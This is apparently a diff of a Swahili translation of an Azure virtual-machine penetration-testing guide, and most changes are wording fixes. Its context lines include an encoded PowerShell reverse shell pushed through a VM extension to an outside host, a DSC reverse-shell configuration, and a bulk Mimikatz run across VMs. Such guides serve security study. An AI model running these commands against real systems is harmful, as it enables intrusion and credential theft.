||||
- **Msingi**: Inaruhusu kwa urahisi kufungua bandari za ndani HTTP (80), HTTPS (443), SSH (22), RDP (3389)
|
||||
- **Msingi**: Inaruhusu kufungua kwa urahisi bandari za ndani HTTP (80), HTTPS (443), SSH (22), RDP (3389)
|
||||
- **Juu**: Chagua kikundi cha usalama
|
||||
- **Nakala**: Inawezekana kuwezesha **Kawaida** nakala (moja kwa siku) na **Imara** (mara nyingi kwa siku)
|
||||
- **Chaguzi za uratibu wa patch**: Hii inaruhusu kiotomatiki kutekeleza patches katika VMs kulingana na sera iliyochaguliwa kama ilivyoelezwa katika [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
|
||||
- **Nakala**: Inawezekana kuwezesha **Msingi** nakala (moja kwa siku) na **Imara** (mara kadhaa kwa siku)
|
||||
- **Chaguzi za uratibu wa patch**: Hii inaruhusu kutekeleza patch kiotomatiki katika VMs kulingana na sera iliyochaguliwa kama ilivyoelezwa katika [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
|
||||
- **Arifa**: Inawezekana kupata arifa kiotomatiki kwa barua pepe au programu ya simu wakati kitu kinatokea katika VM. Kanuni za msingi:
|
||||
- Asilimia ya CPU ni kubwa kuliko 80%
|
||||
- Kumbukumbu Inapatikana Bytes ni chini ya 1GB
|
||||
@@ -38,19 +38,19 @@ Mashine za Kijijini za Azure (VMs) ni seva za **wingu zinazoweza kubadilishwa, z
|
||||
- Mtandao kwa Jumla ni mkubwa kuliko 500GB
|
||||
- Mtandao wa Nje kwa Jumla ni mkubwa kuliko 200GB
|
||||
- VmAvailabilityMetric ni chini ya 1
|
||||
- **Kikaguzi cha Afya**: Kwa kawaida inakagua itifaki ya HTTP katika bandari 80
|
||||
- **Locks**: Inaruhusu kufunga VM ili iweze kusomwa tu (**ReadOnly** lock) au inaweza kusomwa na kusasishwa lakini si kufutwa (**CanNotDelete** lock).
|
||||
- Rasilimali nyingi zinazohusiana na VM **pia zinaunga mkono locks** kama diski, picha za snapshot...
|
||||
- Locks zinaweza pia kutumika katika **kikundi cha rasilimali na viwango vya usajili**
|
||||
- **Kikaguzi cha Afya**: Kwa kawaida inakagua itifaki ya HTTP kwenye bandari 80
|
||||
- **Vizui**: Inaruhusu kufunga vizui kwenye VM ili iweze kusomwa tu (**ReadOnly** lock) au inaweza kusomwa na kusasishwa lakini si kufutwa (**CanNotDelete** lock).
|
||||
- Rasilimali nyingi zinazohusiana na VM **pia zinaunga mkono vizui** kama diski, picha za snapshot...
|
||||
- Vizui vinaweza pia kutumika kwenye **kikundi cha rasilimali na viwango vya usajili**
|
||||
|
||||
## Diski & picha za snapshot
|
||||
|
||||
- Inawezekana **kuwezesha kuunganisha diski kwa VMs 2 au zaidi**
|
||||
- Kwa kawaida kila diski inasimbwa **na funguo ya jukwaa.**
|
||||
- Kwa kawaida kila diski inasimbwa **kwa funguo za jukwaa.**
|
||||
- Vivyo hivyo katika picha za snapshot
|
||||
- Kwa kawaida inawezekana **kushiriki diski kutoka mitandao yote**, lakini pia inaweza **kuzuiliwa** kwa ufikiaji fulani **binafsi** au **kukatisha kabisa** ufikiaji wa umma na binafsi.
|
||||
- Kwa kawaida inawezekana **kushiriki diski kutoka mitandao yote**, lakini pia inaweza **kuzuiwa** kwa ufikiaji fulani **binafsi** au **kukatisha kabisa** ufikiaji wa umma na binafsi.
|
||||
- Vivyo hivyo katika picha za snapshot
|
||||
- Inawezekana **kuunda SAS URI** (ya max siku 60) ili **kuhamasisha diski**, ambayo inaweza kuundwa ili kuhitaji uthibitishaji au la
|
||||
- Inawezekana **kuunda SAS URI** (ya max siku 60) ili **kuhamasisha diski**, ambayo inaweza kuundwa ili kuhitaji uthibitisho au la
|
||||
- Vivyo hivyo katika picha za snapshot
|
||||
|
||||
{{#tabs}}
|
||||
@@ -77,9 +77,9 @@ Get-AzDisk -Name <DiskName> -ResourceGroupName <ResourceGroupName>
|
||||
## Picha, Picha za Galeria & Pointi za Kurejesha
|
||||
|
||||
Picha ya **VM** ni kiolezo kinachojumuisha mfumo wa uendeshaji, mipangilio ya programu na mfumo wa faili unaohitajika ili **kuunda mashine mpya ya virtual (VM)**. Tofauti kati ya picha na snapshot ya diski ni kwamba snapshot ya diski ni nakala ya kusoma tu, ya wakati mmoja ya diski moja inayosimamiwa, inayotumika hasa kwa ajili ya akiba au kutatua matatizo, wakati picha inaweza kuwa na **diski nyingi na imeundwa kutumikia kama kiolezo cha kuunda VMs mpya**.\
|
||||
Picha zinaweza kusimamiwa katika sehemu ya **Picha** ya Azure au ndani ya **galeria za kompyuta za Azure** ambazo zinaruhusu kuunda **matoleo** na **kushiriki** picha hiyo kati ya wapangaji tofauti au hata kuifanya kuwa ya umma.
|
||||
Picha zinaweza kusimamiwa katika **sehemu ya Picha** ya Azure au ndani ya **galeria za kompyuta za Azure** ambazo zinaruhusu kuunda **matoleo** na **kushiriki** picha hiyo kati ya wapangaji tofauti au hata kuifanya iwe ya umma.
|
||||
|
||||
Pointi ya **kurejesha** inahifadhi usanidi wa VM na **snapshot za wakati mmoja** zinazofanana na programu za **diski zote zinazodhibitiwa** zilizounganishwa na VM. Inahusiana na VM na kusudi lake ni kuwa na uwezo wa kurejesha VM hiyo jinsi ilivyokuwa katika wakati huo maalum.
|
||||
Pointi ya **kurejesha** inahifadhi usanidi wa VM na **snapshot za wakati mmoja** zinazofanana na programu za **diski zote zinazosimamiwa** zilizounganishwa na VM. Inahusiana na VM na kusudi lake ni kuwa na uwezo wa kurejesha VM hiyo jinsi ilivyokuwa katika wakati huo maalum.
|
||||
|
||||
{{#tabs}}
|
||||
{{#tab name="az cli"}}
|
||||
@@ -144,13 +144,13 @@ Get-AzRestorePointCollection -Name <CollectionName> -ResourceGroupName <Resource
|
||||
|
||||
## Azure Site Recovery
|
||||
|
||||
Kutoka kwenye [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery husaidia kuhakikisha uendelevu wa biashara kwa kuweka programu za biashara na mizigo ikifanya kazi wakati wa kukatika. Site Recovery **inaiga mizigo** inayofanyika kwenye mashine za kimwili na virtual (VMs) kutoka kwenye tovuti ya msingi hadi eneo la pili. Wakati kukatika kunapotokea kwenye tovuti yako ya msingi, unahamia kwenye eneo la pili, na kufikia programu kutoka hapo. Baada ya eneo la msingi kuanza tena, unaweza kurudi huko.
|
||||
Kutoka kwa [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery husaidia kuhakikisha uendelevu wa biashara kwa kuweka programu za biashara na mizigo ikifanya kazi wakati wa kukatika. Site Recovery **inajirudia mizigo** inayofanya kazi kwenye mashine za kimwili na virtual (VMs) kutoka tovuti ya msingi hadi eneo la pili. Wakati kukatika kunapotokea kwenye tovuti yako ya msingi, unahamia kwenye eneo la pili, na kufikia programu kutoka hapo. Baada ya eneo la msingi kuanza tena, unaweza kurudi huko.
|
||||
|
||||
## Azure Bastion
|
||||
|
||||
Azure Bastion inaruhusu ufikiaji salama na usio na mshono wa **Remote Desktop Protocol (RDP)** na **Secure Shell (SSH)** kwa mashine zako za virtual (VMs) moja kwa moja kupitia Azure Portal au kupitia sanduku la jump. Kwa **kuondoa hitaji la anwani za IP za umma** kwenye VMs zako.
|
||||
|
||||
Bastion inapeleka subnet inayoitwa **`AzureBastionSubnet`** yenye netmask ya `/26` katika VNet inayoihitaji kufanya kazi. Kisha, inaruhusu **kuungana na VMs za ndani kupitia kivinjari** kwa kutumia `RDP` na `SSH` bila kufichua bandari za VMs kwa Mtandao. Inaweza pia kufanya kazi kama **jump host**.
|
||||
Bastion inapeleka subnet inayoitwa **`AzureBastionSubnet`** yenye netmask ya `/26` katika VNet ambayo inahitaji kufanya kazi. Kisha, inaruhusu **kuungana na VMs za ndani kupitia kivinjari** kwa kutumia `RDP` na `SSH` bila kufichua bandari za VMs kwa Mtandao. Inaweza pia kufanya kazi kama **jump host**.
|
||||
|
||||
Ili orodhesha Hosts zote za Azure Bastion katika usajili wako na kuungana na VMs kupitia hizo, unaweza kutumia amri zifuatazo:
|
||||
|
||||
@@ -509,7 +509,7 @@ az vm extension set \
|
||||
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
|
||||
|
||||
```
|
||||
- Tekeleza shell ya kinyume kutoka kwa faili
|
||||
- Tekelea shell ya kurudi kutoka kwa faili
|
||||
```bash
|
||||
az vm extension set \
|
||||
--resource-group <rsc-group> \
|
||||
@@ -533,13 +533,13 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
|
||||
|
||||
### Relevant VM extensions
|
||||
|
||||
Ruhusa inayohitajika bado ni **`Microsoft.Compute/virtualMachines/extensions/write`**.
|
||||
The required permission is still **`Microsoft.Compute/virtualMachines/extensions/write`**.
|
||||
|
||||
<details>
|
||||
|
||||
<summary>VMAccess extension</summary>
|
||||
|
||||
Kipanua hiki kinaruhusu kubadilisha nenosiri (au kuunda ikiwa hakipo) cha watumiaji ndani ya Windows VMs.
|
||||
Extension hii inaruhusu kubadilisha nenosiri (au kuunda ikiwa haipo) ya watumiaji ndani ya Windows VMs.
|
||||
```powershell
|
||||
# Run VMAccess extension to reset the password
|
||||
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
|
||||
@@ -549,9 +549,9 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
|
||||
|
||||
<details>
|
||||
|
||||
<summary>DesiredConfigurationState (DSC)</summary>
|
||||
<summary>DesiredStateConfiguration (DSC)</summary>
|
||||
|
||||
Hii ni **VM extensio**n inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika **kutekeleza amri za kawaida** katika Windows VMs kupitia nyongeza hii:
|
||||
Hii ni **VM extension** inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika **kutekeleza amri za kawaida** katika Windows VMs kupitia nyongeza hii:
|
||||
```powershell
|
||||
# Content of revShell.ps1
|
||||
Configuration RevShellConfig {
|
||||
@@ -603,7 +603,7 @@ Set-AzVMDscExtension `
|
||||
|
||||
<summary>Hybrid Runbook Worker</summary>
|
||||
|
||||
Hii ni nyongeza ya VM ambayo itaruhusu kutekeleza runbooks katika VMs kutoka kwa akaunti ya automatisering. Kwa maelezo zaidi angalia huduma ya [Automation Accounts](../az-automation-account/).
|
||||
Hii ni nyongeza ya VM ambayo itaruhusu kutekeleza runbooks katika VMs kutoka kwa akaunti ya automatisering. Kwa maelezo zaidi angalia huduma ya [Automation Accounts](../az-automation-account/index.html).
|
||||
|
||||
</details>
|
||||
|
||||
@@ -721,16 +721,16 @@ az vm application set \
|
||||
|
||||
### User data
|
||||
|
||||
Hii ni **data ya kudumu** ambayo inaweza kupatikana kutoka kwa kiungo cha metadata wakati wowote. Kumbuka katika Azure, data ya mtumiaji ni tofauti na AWS na GCP kwa sababu **ikiwa utaweka script hapa haitatekelezwa kwa default**.
|
||||
Hii ni **data ya kudumu** ambayo inaweza kupatikana kutoka kwa kiungo cha metadata wakati wowote. Kumbuka katika Azure, data ya mtumiaji ni tofauti na AWS na GCP kwa sababu **ikiwa unaweka script hapa haitekelezwi kwa default**.
|
||||
|
||||
### Custom data
|
||||
|
||||
Inawezekana kupitisha data fulani kwa VM ambayo itahifadhiwa katika njia zinazotarajiwa:
|
||||
|
||||
- Katika **Windows**, data ya kawaida inawekwa katika `%SYSTEMDRIVE%\AzureData\CustomData.bin` kama faili ya binary na haiwezi kusindika.
|
||||
- Katika **Linux**, ilikuwa inahifadhiwa katika `/var/lib/waagent/ovf-env.xml` na sasa inahifadhiwa katika `/var/lib/waagent/CustomData/ovf-env.xml`
|
||||
- **Linux agent**: Haiwezi kusindika data ya kawaida kwa default, picha maalum yenye data iliyoanzishwa inahitajika
|
||||
- **cloud-init:** Kwa default inasindika data ya kawaida na data hii inaweza kuwa katika [**format mbalimbali**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). Inaweza kutekeleza script kwa urahisi kwa kutuma tu script katika data ya kawaida.
|
||||
- Katika **Windows**, data ya kawaida inawekwa katika `%SYSTEMDRIVE%\AzureData\CustomData.bin` kama faili ya binary na haipangwa.
|
||||
- Katika **Linux**, ilihifadhiwa katika `/var/lib/waagent/ovf-env.xml` na sasa inahifadhiwa katika `/var/lib/waagent/CustomData/ovf-env.xml`
|
||||
- **Linux agent**: Haipangi data ya kawaida kwa default, picha maalum yenye data iliyoanzishwa inahitajika
|
||||
- **cloud-init:** Kwa default inachakata data ya kawaida na data hii inaweza kuwa katika [**format mbalimbali**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). Inaweza kutekeleza script kwa urahisi kwa kutuma tu script katika data ya kawaida.
|
||||
- Nilijaribu kwamba zote Ubuntu na Debian zinaweza kutekeleza script unayoweka hapa.
|
||||
- Pia si lazima kuwezesha data ya mtumiaji ili hii itekelezwe.
|
||||
```bash
|
||||
@@ -739,7 +739,7 @@ echo "Hello World" > /var/tmp/output.txt
|
||||
```
|
||||
### **Run Command**
|
||||
|
||||
Hii ni njia ya msingi zaidi ambayo Azure inatoa ili **kutekeleza amri za kawaida katika VMs**. Ruhusa inayohitajika ni `Microsoft.Compute/virtualMachines/runCommand/action`.
|
||||
Hii ni mekanizma ya msingi zaidi ambayo Azure inatoa ili **kutekeleza amri za kiholela katika VMs**. Ruhusa inayohitajika ni `Microsoft.Compute/virtualMachines/runCommand/action`.
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="Linux" }}
|
||||
@@ -808,7 +808,7 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
||||
../../az-persistence/az-vms-persistence.md
|
||||
{{#endref}}
|
||||
|
||||
## Marejeleo
|
||||
## Marejeo
|
||||
|
||||
- [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
|
||||
- [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
|
||||
|
||||
Reference in New Issue
Block a user